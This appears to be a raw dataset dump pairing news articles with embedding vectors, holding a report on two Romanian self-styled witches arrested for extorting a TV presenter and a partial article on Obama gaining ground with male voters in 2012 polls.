-0.02188386395573616,\n -0.023753803223371506,\n 0.02877979539334774,\n -0.057184211909770966,\n 0.06568574905395508,\n 0.00507922051474452,\n -0.04703722149133682,\n 0.07887087017297745,\n -0.036000583320856094,\n -0.06585435569286346,\n -0.03841383010149002,\n -0.09041178971529007,\n 0.05283541604876518,\n -0.03227389603853226,\n -0.012284677475690842,\n -0.051820822060108185,\n -0.01614745706319809,\n 0.0973874107003212,\n -0.05081138387322426,\n 0.04549362137913704,\n 0.016006262972950935,\n 0.059198860079050064,\n -0.030656538903713226,\n -0.020124755799770355,\n 0.08011047542095184,\n -0.03965336084365845,\n -0.0013371158856898546,\n 0.00017193544772453606,\n 0.06026027724146843,\n -0.07138717919588089,\n 0.0025276425294578075,\n -0.0321049727499485,\n -0.09324988722801208,\n -0.046085234731435776,\n 0.016776971518993378,\n 0.0017669567605480552,\n 0.11898750811815262,\n -0.026039354503154755,\n 0.030554383993148804,\n 0.069541335105896,\n 0.061868272721767426,\n -0.05239682272076607,\n 0.042701784521341324,\n 0.06659913063049316,\n 0.012906540185213089,\n 0.010498784482479095,\n 0.04276413097977638,\n 0.005006777122616768,\n -0.07973074167966843,\n -0.0027294724714010954,\n 0.026135403662919998,\n 0.07611716538667679,\n 0.03011263720691204,\n -0.014334186911582947,\n -0.09341730922460556,\n -0.02757357619702816,\n -0.054539065808057785,\n -0.045362088829278946,\n 0.0055362205021083355,\n -0.0374181792140007,\n -0.01320021040737629,\n -0.0967014878988266,\n -0.013134711422026157,\n -0.1057017520070076,\n -0.03276900202035904,\n 0.017531899735331535,\n -0.037929024547338486,\n -0.04144159331917763,\n 0.02849847450852394,\n -0.059814177453517914,\n 0.051629673689603806,\n -0.030310794711112976,\n 0.048627663403749466,\n 0.14376366138458252,\n 0.0584089495241642,\n 0.11473115533590317,\n -0.1115351989865303,\n 2.1580999969082227e-33,\n -0.040947120636701584,\n 0.013250741176307201,\n -0.04799174889922142,\n 0.022810807451605797,\n -0.07446552067995071,\n -0.059531912207603455,\n -0.02932456135749817,\n -0.002751821419224143,\n -0.053707826882600784,\n 0.00225628144107759,\n -0.07941240072250366,\n -0.03811729699373245,\n -0.04009968414902687,\n 0.047146473079919815,\n 0.03367257118225098,\n 0.007174718659371138,\n 0.07642293721437454,\n 0.05801292881369591,\n -0.026579154655337334,\n 0.08569172769784927,\n 0.11218532174825668,\n -0.011064687743782997,\n 0.03311433643102646,\n 0.03348391503095627,\n 0.02362978458404541,\n -0.005760463420301676,\n -0.02202456258237362,\n 0.04235614091157913,\n -0.02605976164340973,\n -0.00525578623637557,\n -0.06585625559091568,\n 0.042481325566768646,\n -0.052543170750141144,\n -0.014698364771902561,\n -0.013057013042271137,\n -0.006035822443664074,\n -0.09361845254898071,\n 0.00031658419175073504,\n -0.0235345009714365,\n -0.01645861193537712,\n 0.07044651359319687,\n -0.03952668234705925,\n -0.02305733412504196,\n 0.036246493458747864,\n 0.11474836617708206,\n -0.09942404180765152,\n -0.04179791361093521,\n -0.01701723225414753,\n -0.026521261781454086,\n -0.06652576476335526,\n 0.000315043464070186,\n -0.006859920918941498,\n 0.0810471698641777,\n 0.05267903953790665,\n 0.034008827060461044,\n -0.0768124908208847,\n -0.02526879496872425,\n 0.03018265962600708,\n 0.05362445488572121,\n -0.0592074878513813,\n -0.05700914189219475,\n -0.10696031153202057,\n 0.01604587957262993,\n 0.03668176755309105,\n 0.06298159807920456,\n 0.06424029171466827,\n 0.009305321611464024,\n 0.03972647711634636,\n -0.06720899045467377,\n 0.06433072686195374,\n 0.04072083905339241,\n -0.017991745844483376,\n 0.07347837835550308,\n 0.055309001356363297,\n -0.004536505788564682,\n 0.02886894717812538,\n 0.016351869329810143,\n 0.002350687747821212,\n 0.08029573410749435,\n 0.02193775400519371,\n -0.07854519039392471,\n 0.020139340311288834,\n 0.045673903077840805,\n 0.020921798422932625,\n -0.050788648426532745,\n -0.030331267043948174,\n -0.017197920009493828,\n -0.06826122105121613,\n -0.0067853908985853195,\n 0.0731004998087883,\n -0.025696981698274612,\n -0.035403527319431305,\n -0.0491139180958271,\n 0.05178830027580261,\n 0.0026015567127615213,\n -3.896974627275062e-33,\n -0.009815866127610207,\n 0.0666271299123764,\n -0.11597715318202972,\n -0.009545053355395794,\n -0.0466751903295517,\n 0.04663592576980591,\n 0.011013822630047798,\n 0.040564075112342834,\n -0.05960620194673538,\n -0.005903576500713825,\n 0.010203712619841099,\n -0.10104180872440338,\n -0.031042952090501785,\n 0.08108571171760559,\n -0.003743154462426901,\n 0.017640890553593636,\n 0.1193377897143364,\n 0.10272061824798584,\n 0.0044348579831421375,\n -0.07564405351877213,\n 0.05135291442275047,\n -0.062352027744054794,\n -0.0007617055671289563,\n 0.030257750302553177,\n 0.040723491460084915,\n 0.020913777872920036,\n 0.09724419564008713,\n -0.018789872527122498,\n -0.08571822941303253,\n -0.05118118226528168,\n -0.009694617241621017,\n 0.003515578806400299,\n 0.02775954082608223,\n 0.08730202913284302,\n 0.03284713253378868,\n 0.056012023240327835,\n 0.0457480363547802,\n -0.0032455846667289734,\n -0.031346894800662994,\n 0.004602415952831507,\n 0.029167696833610535,\n -0.07254885137081146,\n -0.03862849250435829,\n 0.08275530487298965,\n -0.044242504984140396,\n -0.05101567134261131,\n 0.06683921813964844,\n 0.10552644729614258,\n 0.0000687463179929182,\n -0.024234799668192863,\n -0.04056473821401596,\n 0.03951696306467056,\n 0.009777332656085491,\n -0.09246315062046051,\n 0.010631393641233444,\n 0.021251888945698738,\n 0.024890271946787834,\n -0.020427541807293892,\n 0.10444489121437073,\n -0.018550563603639603,\n 0.009623019956052303,\n 0.00027408095775172114,\n 0.06452324241399765,\n 0.007656199857592583,\n -0.059088632464408875,\n 0.009755660779774189,\n -0.05237327143549919,\n 0.04223770648241043,\n 0.08226162940263748,\n 0.026585692539811134,\n 0.05036287382245064,\n 0.002505392301827669,\n 0.045567434281110764,\n 0.014935814775526524,\n 0.04851355776190758,\n -0.04365326836705208,\n 0.010357963852584362,\n 0.02373109944164753,\n -0.031022684648633003,\n 0.013956527225673199,\n -0.05280456691980362,\n -0.0901646688580513,\n -0.07311349362134933,\n -0.02552243322134018,\n 0.009461071342229843,\n 0.03906337916851044,\n 0.019625172019004822,\n -0.049321532249450684,\n -0.0335397906601429,\n -0.06786243617534637,\n -0.05434538424015045,\n -0.01793256774544716,\n -0.009404698386788368,\n 0.025365544483065605,\n -0.05348614230751991,\n -4.9940364732492526e-8,\n 0.05213306099176407,\n -0.03216135501861572,\n -0.0049612317234277725,\n -0.0065375929698348045,\n -0.03262085095047951,\n 0.010192019864916801,\n -0.012970774434506893,\n -0.02213939279317856,\n -0.08528418838977814,\n -0.015710102394223213,\n 0.023460807278752327,\n 0.01595367304980755,\n -0.04055522382259369,\n -0.017515093088150024,\n 0.009933874011039734,\n 0.026964375749230385,\n 0.006597036961466074,\n -0.02222629263997078,\n -0.06796664744615555,\n -0.02951662242412567,\n -0.001701928093098104,\n 0.01642942614853382,\n -0.0812319666147232,\n 0.007260218728333712,\n -0.004247289150953293,\n 0.04320739209651947,\n 0.012048904784023762,\n 0.03126479312777519,\n 0.008629649877548218,\n -0.05884688347578049,\n 0.03446667268872261,\n -0.05512944608926773,\n -0.0307157039642334,\n 0.04227856919169426,\n 0.004790252074599266,\n 0.05745123326778412,\n 0.010204414837062359,\n 0.0006586037343367934,\n -0.0004006456001661718,\n 0.023798799142241478,\n -0.07885779440402985,\n 0.049758508801460266,\n 0.005610066466033459,\n 0.06039297208189964,\n -0.03772537410259247,\n -0.012959943152964115,\n -0.05098150670528412,\n -0.07336466014385223,\n 0.003925350494682789,\n 0.008457073010504246,\n -0.013005477376282215,\n 0.035156767815351486,\n -0.0071088154800236225,\n 0.02882387489080429,\n -0.04032854735851288,\n 0.1196461021900177,\n 0.025265462696552277,\n -0.03353484719991684,\n 0.08700904250144958,\n 0.0720800906419754,\n -0.02191094681620598,\n -0.060122255235910416,\n -0.011603276245296001,\n 0.02554982155561447\n]"}}},{"rowIdx":1295,"cells":{"text":{"kind":"string","value":"This article is over 7 years old\n\nTV presenter handed over £378,000 in exchange for spells said to involve animal sacrifice\n\nTwo self-professed witches have been detained in Romania on blackmail and extortion charges in a high-profile case involving a TV star and reportedly other public figures.\n\nA police spokesman, Christian Ciocan, said the two women – who go by the single names of Melissa and Vanessa – approached public figures promising to help them overcome work or love difficulties, and break curses.\n\nHe said the women initially charged very little, but then, as their victims became hooked on their services, increased their prices.\n\nCiocan cited one case where the victim – who later publicly identified herself as actor, singer and TV presenter Oana Zavoranu – handed over €450,000 (£378,000) in cash and property in exchange for spells.\n\nHe said the witches practised black magic, and sacrificed animals in graveyards and near rivers, claiming this would protect Zavoranu from her mother and in-laws who had put a curse on her.\n\nThe witches, however, claim Zavoranu is being vengeful because she asked them to cast a spell that would kill her mother, but the mother is still alive.\n\nThe ex-wife of businessman Cristi Borcea, one of two owners of Romanian football team Dinamo Bucharest, was also cited as a victim, but she has neither confirmed or denied the case.\n\nCiocan said if the victims tried to cease payment, the two women would threaten to put a spell on them, or disclose details of their personal lives.\n\nA court ruled on WednesdayMelissa and Vanessa would be released later the same day, awaiting trial.\n\nMany people believe in witchcraft in Romania. President Traian Basescu and his aides have been known to wear purple on certain days, supposedly to ward off evil.\n\nRomania has recently been trying to introduce legislation to limit witchcraft. This month, Nicolae Paun, who represents the Roma in parliament, said legislation must be enacted to stop what he called \"backward practices\".\n\nMost self-professed witches in Romania are Roma."},"embedding":{"kind":"list like","value":[-0.0003954989369958639,0.007664505857974291,-0.08139637112617493,0.03980080783367157,-0.037526797503232956,0.020933836698532104,0.10276232659816742,0.01925133727490902,0.0004816286382265389,-0.013854178600013256,0.012741344049572945,-0.05026845261454582,-0.00876015704125166,0.014948968775570393,-0.062494903802871704,0.020919272676110268,-0.01922011189162731,-0.01617099530994892,-0.08646095544099808,0.12717287242412567,-0.02137310989201069,-0.060815636068582535,0.04636070877313614,-0.010376331396400928,0.011591761372983456,-0.03521397337317467,-0.03384480997920036,-0.05039786174893379,-0.03967008739709854,0.008597004227340221,0.0188206285238266,0.017833920195698738,-0.09441694617271423,-0.03707028925418854,-0.01706625148653984,0.0062416717410087585,0.009892366826534271,0.0614670030772686,-0.08730927109718323,-0.04563319310545921,0.051591094583272934,-0.05058404803276062,-0.12053991109132767,0.005358634516596794,-0.04270104691386223,-0.055158279836177826,0.10936599224805832,0.05335068702697754,-0.06655868887901306,-0.07256972789764404,-0.03206716477870941,0.013069670647382736,-0.012139436788856983,0.06397119164466858,-0.06928595155477524,-0.10882983356714249,0.023569704964756966,0.009929216466844082,0.008984431624412537,0.029079530388116837,0.025837687775492668,0.03462807461619377,0.019877156242728233,0.038334161043167114,0.03325663506984711,-0.0017736820736899972,0.05231105163693428,0.041061218827962875,-0.013677876442670822,-0.030916528776288033,0.046374741941690445,-0.02826358750462532,0.0072842007502913475,-0.030861319974064827,0.001734216115437448,0.05705754831433296,0.06941141188144684,-0.07247985899448395,0.040324144065380096,-0.016595905646681786,0.06082852929830551,-0.08540284633636475,0.023319251835346222,0.02436918206512928,0.07366181164979935,-0.010635348036885262,0.0031528885010629892,-0.013024313375353813,0.10400853306055069,0.02983791194856167,-0.0010487561812624335,0.03446543216705322,0.033447638154029846,-0.00011998652917100117,0.05982203036546707,-0.03167764097452164,-0.013412642292678356,-0.013501002453267574,-0.09020374715328217,0.1347579061985016,-0.04986224323511124,0.012266889214515686,0.02929985523223877,-0.01875520497560501,0.013757574371993542,0.0010734472889453173,0.03576993942260742,-0.03537275642156601,-0.02963930554687977,0.0643690824508667,-0.02653055638074875,-0.003625589655712247,-0.02983986958861351,-0.049499426037073135,0.06653942167758942,0.11068344116210938,0.003405895782634616,0.03071519359946251,-0.0013803552137687802,-0.09507717937231064,0.0479901060461998,0.02968793921172619,-0.04415036737918854,0.04333535209298134,0.00892315711826086,-0.04163384065032005,-0.06458884477615356,5.340363773307764e-33,0.026850154623389244,-0.029376983642578125,-0.012947333045303822,-0.01761181838810444,0.01556431595236063,0.14102348685264587,-0.07804962992668152,0.12123145908117294,0.014074540697038174,-0.013211599551141262,0.01642022840678692,-0.10148753225803375,0.0573524609208107,-0.09786632657051086,-0.09611178934574127,0.03969369828701019,0.026524696499109268,-0.02342154085636139,0.03440174087882042,0.004491385538130999,0.10885725915431976,0.04386308789253235,-0.0015254662139341235,0.012485298328101635,-0.10631968826055527,-0.07104168087244034,-0.02202104963362217,-0.011159864254295826,0.0818866714835167,-0.012667900882661343,-0.010628246702253819,-0.03197021409869194,0.08616561442613602,-0.05844036862254143,0.03816893324255943,-0.01418890617787838,0.010894687846302986,-0.09346695989370346,0.03650854155421257,-0.00027922377921640873,-0.054088033735752106,0.006373034790158272,0.08990558981895447,-0.027039581909775734,-0.07323068380355835,0.017063645645976067,-0.05535677447915077,-0.048166513442993164,-0.061408378183841705,0.042050864547491074,0.004118562676012516,0.04524029791355133,-0.059511441737413406,-0.004491523373872042,-0.07941662520170212,0.013576585799455643,-0.05079437047243118,-0.04181019216775894,0.06052820384502411,-0.04444870352745056,0.03149236738681793,-0.041289590299129486,0.015346757136285305,-0.009206149727106094,-0.023219937458634377,-0.06301666796207428,0.021407488733530045,0.056402791291475296,0.0010711115319281816,-0.022711131721735,-0.058632221072912216,0.038115233182907104,0.004518087487667799,-0.06822653114795685,-0.05061880871653557,0.010537429712712765,0.07266385853290558,0.009382786229252815,-0.06067270785570145,0.0893561989068985,0.04947863891720772,0.015657341107726097,0.04329666867852211,0.02489684522151947,-0.0068716430105268955,0.005746208131313324,-0.0407290980219841,-0.08538158237934113,0.03864124417304993,-0.000678437587339431,0.0951826348900795,0.015849094837903976,-0.0007498639752157032,-0.1407666951417923,0.006228920072317123,-4.83440235203905e-33,-0.05629841610789299,-0.025611916556954384,-0.0025676123332232237,-0.010213315486907959,0.09072355180978775,-0.09074907004833221,-0.0805852934718132,0.021414922550320625,0.03958753123879433,-0.027331938967108727,-0.07614738494157791,-0.053487397730350494,0.04168962687253952,0.05127221345901489,0.002524192677810788,-0.04332095757126808,0.01671634241938591,0.003788525704294443,0.0665622130036354,-0.06577465683221817,-0.0066649834625422955,0.09383588284254074,-0.08940146863460541,0.023348994553089142,-0.03093191795051098,0.025659974664449692,0.09991937130689621,0.021724658086895943,0.011207982897758484,0.0034092224668711424,0.02456461265683174,0.013324649073183537,-0.022140946239233017,0.00986288022249937,-0.047239046543836594,0.07729161530733109,0.032845061272382736,-0.034855104982852936,-0.07924176007509232,-0.060937270522117615,0.0645579993724823,0.011944236233830452,-0.050663065165281296,0.0003571116249077022,-0.061329882591962814,-0.039476990699768066,0.03437386080622673,0.042559511959552765,0.1520259827375412,-0.031215708702802658,0.07596687972545624,0.026003235951066017,-0.09423653036355972,0.012199096381664276,0.053566817194223404,-0.04466333985328674,0.02540605142712593,-0.0937488004565239,0.05097923427820206,-0.04028308764100075,0.01278377790004015,-0.014442285522818565,-0.039500124752521515,-0.005781886167824268,-0.030828896909952164,0.013318251818418503,0.02008751966059208,-0.019430244341492653,0.004456710536032915,-0.05163348466157913,0.02047465741634369,0.01526481844484806,-0.02197120152413845,-0.024644402787089348,0.004933593329042196,0.13236655294895172,0.06924515217542648,0.02448633499443531,0.052921149879693985,-0.016693858429789543,0.06750161200761795,-0.13340972363948822,0.0894102156162262,0.03216468542814255,0.02300368621945381,-0.02016620710492134,0.039711855351924896,0.02271345630288124,0.030596276745200157,0.03481312841176987,0.017086032778024673,-0.004844886250793934,0.10871588438749313,0.01687193661928177,0.0434543676674366,-5.5916657970556116e-8,-0.013105625286698341,-0.04609362408518791,0.009970230981707573,0.040126726031303406,0.023532120510935783,0.00548846460878849,0.0482231006026268,-0.04104321449995041,-0.05621364340186119,0.07079953700304031,-0.01934247650206089,0.04036783427000046,0.04527123272418976,-0.064981609582901,0.03268881142139435,0.03200267255306244,0.052290767431259155,-0.045705731958150864,-0.032753050327301025,0.05710763484239578,-0.0521249882876873,0.06693495064973831,-0.03901249170303345,-0.035675980150699615,0.017986103892326355,-0.05247737094759941,-0.06736552715301514,0.009570907801389694,0.0027055770624428988,0.0067696040496230125,0.006775808986276388,-0.02873837761580944,0.028711488470435143,-0.03566236421465874,-0.0034700529649853706,-0.05492974817752838,-0.09518369287252426,-0.004725364036858082,-0.059059202671051025,-0.011116244830191135,0.021730609238147736,-0.019318712875247,0.11694515496492386,0.02183871529996395,0.01644851639866829,-0.055136051028966904,-0.07400915771722794,-0.04497089236974716,0.029689176008105278,-0.005801578052341938,0.00914166308939457,0.05297663062810898,0.08620759844779968,0.05768894404172897,0.021799039095640182,-0.11913657188415527,-0.017967863008379936,0.061056315898895264,-0.053237296640872955,0.04034380242228508,0.018864605575799942,-0.09654633700847626,-0.006117031443864107,-0.02928057871758938],"string":"[\n -0.0003954989369958639,\n 0.007664505857974291,\n -0.08139637112617493,\n 0.03980080783367157,\n -0.037526797503232956,\n 0.020933836698532104,\n 0.10276232659816742,\n 0.01925133727490902,\n 0.0004816286382265389,\n -0.013854178600013256,\n 0.012741344049572945,\n -0.05026845261454582,\n -0.00876015704125166,\n 0.014948968775570393,\n -0.062494903802871704,\n 0.020919272676110268,\n -0.01922011189162731,\n -0.01617099530994892,\n -0.08646095544099808,\n 0.12717287242412567,\n -0.02137310989201069,\n -0.060815636068582535,\n 0.04636070877313614,\n -0.010376331396400928,\n 0.011591761372983456,\n -0.03521397337317467,\n -0.03384480997920036,\n -0.05039786174893379,\n -0.03967008739709854,\n 0.008597004227340221,\n 0.0188206285238266,\n 0.017833920195698738,\n -0.09441694617271423,\n -0.03707028925418854,\n -0.01706625148653984,\n 0.0062416717410087585,\n 0.009892366826534271,\n 0.0614670030772686,\n -0.08730927109718323,\n -0.04563319310545921,\n 0.051591094583272934,\n -0.05058404803276062,\n -0.12053991109132767,\n 0.005358634516596794,\n -0.04270104691386223,\n -0.055158279836177826,\n 0.10936599224805832,\n 0.05335068702697754,\n -0.06655868887901306,\n -0.07256972789764404,\n -0.03206716477870941,\n 0.013069670647382736,\n -0.012139436788856983,\n 0.06397119164466858,\n -0.06928595155477524,\n -0.10882983356714249,\n 0.023569704964756966,\n 0.009929216466844082,\n 0.008984431624412537,\n 0.029079530388116837,\n 0.025837687775492668,\n 0.03462807461619377,\n 0.019877156242728233,\n 0.038334161043167114,\n 0.03325663506984711,\n -0.0017736820736899972,\n 0.05231105163693428,\n 0.041061218827962875,\n -0.013677876442670822,\n -0.030916528776288033,\n 0.046374741941690445,\n -0.02826358750462532,\n 0.0072842007502913475,\n -0.030861319974064827,\n 0.001734216115437448,\n 0.05705754831433296,\n 0.06941141188144684,\n -0.07247985899448395,\n 0.040324144065380096,\n -0.016595905646681786,\n 0.06082852929830551,\n -0.08540284633636475,\n 0.023319251835346222,\n 0.02436918206512928,\n 0.07366181164979935,\n -0.010635348036885262,\n 0.0031528885010629892,\n -0.013024313375353813,\n 0.10400853306055069,\n 0.02983791194856167,\n -0.0010487561812624335,\n 0.03446543216705322,\n 0.033447638154029846,\n -0.00011998652917100117,\n 0.05982203036546707,\n -0.03167764097452164,\n -0.013412642292678356,\n -0.013501002453267574,\n -0.09020374715328217,\n 0.1347579061985016,\n -0.04986224323511124,\n 0.012266889214515686,\n 0.02929985523223877,\n -0.01875520497560501,\n 0.013757574371993542,\n 0.0010734472889453173,\n 0.03576993942260742,\n -0.03537275642156601,\n -0.02963930554687977,\n 0.0643690824508667,\n -0.02653055638074875,\n -0.003625589655712247,\n -0.02983986958861351,\n -0.049499426037073135,\n 0.06653942167758942,\n 0.11068344116210938,\n 0.003405895782634616,\n 0.03071519359946251,\n -0.0013803552137687802,\n -0.09507717937231064,\n 0.0479901060461998,\n 0.02968793921172619,\n -0.04415036737918854,\n 0.04333535209298134,\n 0.00892315711826086,\n -0.04163384065032005,\n -0.06458884477615356,\n 5.340363773307764e-33,\n 0.026850154623389244,\n -0.029376983642578125,\n -0.012947333045303822,\n -0.01761181838810444,\n 0.01556431595236063,\n 0.14102348685264587,\n -0.07804962992668152,\n 0.12123145908117294,\n 0.014074540697038174,\n -0.013211599551141262,\n 0.01642022840678692,\n -0.10148753225803375,\n 0.0573524609208107,\n -0.09786632657051086,\n -0.09611178934574127,\n 0.03969369828701019,\n 0.026524696499109268,\n -0.02342154085636139,\n 0.03440174087882042,\n 0.004491385538130999,\n 0.10885725915431976,\n 0.04386308789253235,\n -0.0015254662139341235,\n 0.012485298328101635,\n -0.10631968826055527,\n -0.07104168087244034,\n -0.02202104963362217,\n -0.011159864254295826,\n 0.0818866714835167,\n -0.012667900882661343,\n -0.010628246702253819,\n -0.03197021409869194,\n 0.08616561442613602,\n -0.05844036862254143,\n 0.03816893324255943,\n -0.01418890617787838,\n 0.010894687846302986,\n -0.09346695989370346,\n 0.03650854155421257,\n -0.00027922377921640873,\n -0.054088033735752106,\n 0.006373034790158272,\n 0.08990558981895447,\n -0.027039581909775734,\n -0.07323068380355835,\n 0.017063645645976067,\n -0.05535677447915077,\n -0.048166513442993164,\n -0.061408378183841705,\n 0.042050864547491074,\n 0.004118562676012516,\n 0.04524029791355133,\n -0.059511441737413406,\n -0.004491523373872042,\n -0.07941662520170212,\n 0.013576585799455643,\n -0.05079437047243118,\n -0.04181019216775894,\n 0.06052820384502411,\n -0.04444870352745056,\n 0.03149236738681793,\n -0.041289590299129486,\n 0.015346757136285305,\n -0.009206149727106094,\n -0.023219937458634377,\n -0.06301666796207428,\n 0.021407488733530045,\n 0.056402791291475296,\n 0.0010711115319281816,\n -0.022711131721735,\n -0.058632221072912216,\n 0.038115233182907104,\n 0.004518087487667799,\n -0.06822653114795685,\n -0.05061880871653557,\n 0.010537429712712765,\n 0.07266385853290558,\n 0.009382786229252815,\n -0.06067270785570145,\n 0.0893561989068985,\n 0.04947863891720772,\n 0.015657341107726097,\n 0.04329666867852211,\n 0.02489684522151947,\n -0.0068716430105268955,\n 0.005746208131313324,\n -0.0407290980219841,\n -0.08538158237934113,\n 0.03864124417304993,\n -0.000678437587339431,\n 0.0951826348900795,\n 0.015849094837903976,\n -0.0007498639752157032,\n -0.1407666951417923,\n 0.006228920072317123,\n -4.83440235203905e-33,\n -0.05629841610789299,\n -0.025611916556954384,\n -0.0025676123332232237,\n -0.010213315486907959,\n 0.09072355180978775,\n -0.09074907004833221,\n -0.0805852934718132,\n 0.021414922550320625,\n 0.03958753123879433,\n -0.027331938967108727,\n -0.07614738494157791,\n -0.053487397730350494,\n 0.04168962687253952,\n 0.05127221345901489,\n 0.002524192677810788,\n -0.04332095757126808,\n 0.01671634241938591,\n 0.003788525704294443,\n 0.0665622130036354,\n -0.06577465683221817,\n -0.0066649834625422955,\n 0.09383588284254074,\n -0.08940146863460541,\n 0.023348994553089142,\n -0.03093191795051098,\n 0.025659974664449692,\n 0.09991937130689621,\n 0.021724658086895943,\n 0.011207982897758484,\n 0.0034092224668711424,\n 0.02456461265683174,\n 0.013324649073183537,\n -0.022140946239233017,\n 0.00986288022249937,\n -0.047239046543836594,\n 0.07729161530733109,\n 0.032845061272382736,\n -0.034855104982852936,\n -0.07924176007509232,\n -0.060937270522117615,\n 0.0645579993724823,\n 0.011944236233830452,\n -0.050663065165281296,\n 0.0003571116249077022,\n -0.061329882591962814,\n -0.039476990699768066,\n 0.03437386080622673,\n 0.042559511959552765,\n 0.1520259827375412,\n -0.031215708702802658,\n 0.07596687972545624,\n 0.026003235951066017,\n -0.09423653036355972,\n 0.012199096381664276,\n 0.053566817194223404,\n -0.04466333985328674,\n 0.02540605142712593,\n -0.0937488004565239,\n 0.05097923427820206,\n -0.04028308764100075,\n 0.01278377790004015,\n -0.014442285522818565,\n -0.039500124752521515,\n -0.005781886167824268,\n -0.030828896909952164,\n 0.013318251818418503,\n 0.02008751966059208,\n -0.019430244341492653,\n 0.004456710536032915,\n -0.05163348466157913,\n 0.02047465741634369,\n 0.01526481844484806,\n -0.02197120152413845,\n -0.024644402787089348,\n 0.004933593329042196,\n 0.13236655294895172,\n 0.06924515217542648,\n 0.02448633499443531,\n 0.052921149879693985,\n -0.016693858429789543,\n 0.06750161200761795,\n -0.13340972363948822,\n 0.0894102156162262,\n 0.03216468542814255,\n 0.02300368621945381,\n -0.02016620710492134,\n 0.039711855351924896,\n 0.02271345630288124,\n 0.030596276745200157,\n 0.03481312841176987,\n 0.017086032778024673,\n -0.004844886250793934,\n 0.10871588438749313,\n 0.01687193661928177,\n 0.0434543676674366,\n -5.5916657970556116e-8,\n -0.013105625286698341,\n -0.04609362408518791,\n 0.009970230981707573,\n 0.040126726031303406,\n 0.023532120510935783,\n 0.00548846460878849,\n 0.0482231006026268,\n -0.04104321449995041,\n -0.05621364340186119,\n 0.07079953700304031,\n -0.01934247650206089,\n 0.04036783427000046,\n 0.04527123272418976,\n -0.064981609582901,\n 0.03268881142139435,\n 0.03200267255306244,\n 0.052290767431259155,\n -0.045705731958150864,\n -0.032753050327301025,\n 0.05710763484239578,\n -0.0521249882876873,\n 0.06693495064973831,\n -0.03901249170303345,\n -0.035675980150699615,\n 0.017986103892326355,\n -0.05247737094759941,\n -0.06736552715301514,\n 0.009570907801389694,\n 0.0027055770624428988,\n 0.0067696040496230125,\n 0.006775808986276388,\n -0.02873837761580944,\n 0.028711488470435143,\n -0.03566236421465874,\n -0.0034700529649853706,\n -0.05492974817752838,\n -0.09518369287252426,\n -0.004725364036858082,\n -0.059059202671051025,\n -0.011116244830191135,\n 0.021730609238147736,\n -0.019318712875247,\n 0.11694515496492386,\n 0.02183871529996395,\n 0.01644851639866829,\n -0.055136051028966904,\n -0.07400915771722794,\n -0.04497089236974716,\n 0.029689176008105278,\n -0.005801578052341938,\n 0.00914166308939457,\n 0.05297663062810898,\n 0.08620759844779968,\n 0.05768894404172897,\n 0.021799039095640182,\n -0.11913657188415527,\n -0.017967863008379936,\n 0.061056315898895264,\n -0.053237296640872955,\n 0.04034380242228508,\n 0.018864605575799942,\n -0.09654633700847626,\n -0.006117031443864107,\n -0.02928057871758938\n]"}}},{"rowIdx":1296,"cells":{"text":{"kind":"string","value":"Mitt Romney’s advantage among male voters has all but disappeared since the Democratic National Convention.\n\nThe pattern will likely spell doom for Romney unless it represents an entirely transient “bump” for President Obama — which it might.\n\nADVERTISEMENT\n\nSeveral polls released in recent days show Obama displaying new strength among male voters. Romney needs to win the male electorate by a wide margin to overcome the chronic disadvantage the GOP faces with respect to women.\n\nA CNN poll released Monday showed Obama moving into a small lead among men, besting Romney 48 percent to 47. The finding was especially notable because CNN, in a poll conducted about a week prior, had shown Romney holding a 12-point lead among men (55 percent to 43).\n\nOn Tuesday, an ABC News/Washington Post poll found Obama enjoying a 3-point edge among men.\n\nIn a memo accompanying the poll’s release, its authors, Langer Research Associates, noted that “Obama’s support has reached a new high among men” — higher than at any point during this election cycle.\n\nIn addition, a new poll from the Democratic-leaning Public Policy Polling organization found that Obama has a 1-point lead among men, taking 47 percent to Romney’s 46.\n\nDemocrats are delighted with those numbers.\n\n“If that holds, there’s no way Romney can win,” said Bob Shrum, the longtime Democratic strategist who ran Sen. John Kerry John Forbes KerryOvernight Defense: White House eyes budget maneuver to boost defense spending | Trump heads to Hanoi for second summit with Kim | Former national security officials rebuke Trump on emergency declaration 58 ex-national security officials rebuke Trump over emergency declaration Ex-national security officials to issue statement slamming Trump's emergency declaration: WaPo MORE’s (D-Mass.) 2004 bid for the White House.\n\nThe Romney campaign has been pushing back hard against the polls in recent days. On Monday, it circulated a memo from its in-house pollster, Neil Newhouse, asserting that no one should “get too worked up about the latest polling” and characterizing the boost Obama is enjoying as a “sugar-high.”\n\nOn Tuesday, a Romney campaign aide told The Hill that the shift in male voting intentions was part of the same pattern. “He got a temporary boost that shouldn’t last long,” the aide argued.\n\nStill, even Republicans who think that those predictions will ultimately prove true admit their worries about the current state of play.\n\n“It’s definitely a concern,” said Dan Judy, a vice president at North Star Opinion Research, a GOP firm. “Men, and especially white men, are a core constituency for Republicans, especially in swing states. Romney’s got to run up big, big margins with them.”\n\nOne case in point is the 2004 presidential election. Kerry beat President George W. Bush by 3 percentage points among female voters (51 percent to 48), according to exit polls. But Bush prevailed by winning male voters by a whopping 11-point margin (55-44).\n\nIn 2008, Obama won the female vote by 13 percentage points (56-43) over his Republican opponent, Sen. John McCain John Sidney McCainGOP lobbyists worry Trump lags in K Street fundraising Mark Kelly kicks off Senate bid: ‘A mission to lift up hardworking Arizonans’ Gabbard hits back at Meghan McCain after fight over Assad MORE (Ariz.). By comparison, he edged McCain by just a single point among men overall (49-48), and lost white men by 16 percentage points.\n\nReasons for the recent shift are not entirely clear.\n\nSome commentators point to the tone of the Democratic National Convention as, in parts, having particular appeal to men. Democratic strategist James Carville told CNN that Obama’s own speech was “muscular,” perhaps alluding to its sharp attacks on Romney on matters of foreign policy.\n\nFormer President Clinton, Vice President Biden and Kerry sought to paint Obama as strong and decisive — and, at times, attacked Romney and the Republicans as effete.\n\nObama, Biden testified, “has courage in his soul, compassion in his heart and steel in his spine.”\n\n“Ask Osama bin Laden if he is better off now than he was four years ago,” Kerry said during his speech, in which he also said, “It isn’t fair to say that Mitt Romney doesn’t have a position on Afghanistan. He has every position.”\n\nJudy said he was not surprised to see the Democrats trying to seize the national-security mantle “because there are not a whole lot of areas where Barack Obama Barack Hussein ObamaWith low birth rate, America needs future migrants 4 ways Hillary looms over the 2020 race Obama goes viral after sporting black bomber jacket with '44' on sleeve at basketball game MORE can point to his record. Every time Democrats talk about [the bin Laden operation] is time they don’t have to spend talking about the economy, or ObamaCare, or a lot of other things that are not so popular.”\n\nJudy argued that, once memories of the conventions begin to fade, the electorate will focus again on the economy. This, he asserted, would be to Romney’s benefit.\n\nFor the moment, however, Democrats are very happy with where things stand. And one of the more recent attempts for Romney to boost his machismo — the 